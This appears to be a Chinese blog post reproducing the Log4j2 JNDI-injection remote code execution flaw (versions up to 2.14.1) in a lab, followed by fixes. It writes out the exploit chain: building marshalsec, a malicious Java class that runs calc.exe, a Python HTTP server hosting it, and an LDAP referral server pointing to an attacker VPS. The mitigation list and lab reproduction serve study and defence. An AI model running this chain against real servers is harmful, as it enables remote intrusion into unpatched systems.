Apache Log4j2远程代码执行漏洞复现

本文详细介绍了Log4j2版本低于2.15.0-rc2时存在的JNDI注入远程代码执行漏洞,包括影响版本、漏洞复现步骤、攻击环境搭建以及修复方法。通过实例演示了如何利用marshalsec进行漏洞复现,并提供了官方发布的补丁链接和多种缓解措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞原理

log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。

影响版本

Log4j2.x<=2.14.1

漏洞复现

漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/1oesQz-UkpqKN3BQH9BKtw
准备环境

把受影响的jar包拖进随手创建的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。

image-20211210132954085

image-20211210133023757

攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)复现环境的jdk版本最好<=8u191,基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。

这里我的复现环境java版本是
在这里插入图片描述

vps下载marshalsec(我这里已经安装好):

git clone https://github.com/mbechler/marshalsec.git

image-20211210133856365

然后安装maven:

apt-get install maven

然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行:

mvn clean package -DskipTests

都成功后,编译恶意类代码robots.java

再用javac编译成robots.class文件

javac robots.java
import java.lang.Runtime;
import java.lang.Process;
public class robots{
 static {
 try {
 Runtime rt = Runtime.getRuntime();
 String[] commands = {"calc.exe"};
 Process pc = rt.exec(commands);
 pc.waitFor();
 } catch (Exception e) {
 // do nothing
 }
 }
}

image-20211210135150189

搭建http服务传输恶意class文件

python -m SimpleHTTPServer 80

image-20211210135524252

然后我们借助marshalsec项目,启动一个LDAP服务器,监听9999端口,这里的ip为vps的ip

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x/#robots" 9999

image-20211210135542910

成功执行

跟fastjson复现步骤差不多,可以参考我fastjson的文章:https://www.freebuf.com/articles/web/283585.html

修复方法

截止到目前,网上的修复方法大致是这些:

补丁链接:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值